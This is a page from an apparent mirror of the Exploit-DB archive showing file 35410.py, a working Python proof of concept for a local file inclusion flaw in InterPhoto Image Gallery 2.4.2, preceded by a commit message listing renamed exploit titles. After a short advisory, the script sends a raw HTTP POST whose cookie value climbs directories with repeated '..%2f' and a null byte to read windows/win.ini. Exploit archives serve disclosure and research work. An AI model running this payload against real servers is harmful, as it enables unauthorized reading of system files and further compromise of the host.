bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/webapps/35410.py
Offensive Security 9640473c86 DB: 2017-07-20 
23 new exploits

Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service
Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service

SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)
SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)

Kaspersky 17.0.0 - Local CA root Incorrectly Protected
Kaspersky 17.0.0 - Local CA Root Incorrectly Protected

Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass
Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)

WICD - Local Privilege Esclation Exploit
WICD 1.7.1 - Local Privilege Escalation

Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions
Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions
Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit
OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit
Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation
OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation

Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation

HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution

Trend Micro Interscan VirusWall localweb - Directory Traversal

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting

Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)

XAMPP 1.6.x - 'showcode.php' Local File Inclusion

Yealink VoIP Phone SIP-T38G - Local File Inclusion

InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)

DreamBox DM800 - 'file' Parameter Local File Disclosure

Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting

TP-Link TL-WR841N Router - Local File Inclusion

Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities

Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure

Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)

Vivvo Article Manager 3.4 - (root) Local File Inclusion
Vivvo Article Manager 3.4 - 'root' Local File Inclusion

60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion
60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion

HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution

Trend Micro Interscan VirusWall localweb - Directory Traversal

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting
Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion
Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion

Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)

XAMPP 1.6.x - 'showcode.php' Local File Inclusion

Yealink VoIP Phone SIP-T38G - Local File Inclusion

InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)

DreamBox DM800 - 'file' Parameter Local File Disclosure

Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting

TP-Link TL-WR841N Router - Local File Inclusion

Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities

Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure

Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)
Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
2017-07-20 05:01:21 +00:00

56 lines
No EOL
2.1 KiB
Python
Executable file
Raw Blame History

source: http://www.securityfocus.com/bid/46759/info
InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................InterPhoto 2.4.2
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://www.weensoft.com/
# Release Date............3/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ........................Bryce Darling <bryce@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in InterPhoto 2.4.2 can be
# exploited to include arbitrary files.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/interphoto'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/about.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 0\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n')
print s.recv(8192)
Reference in a new issue View git blame Copy permalink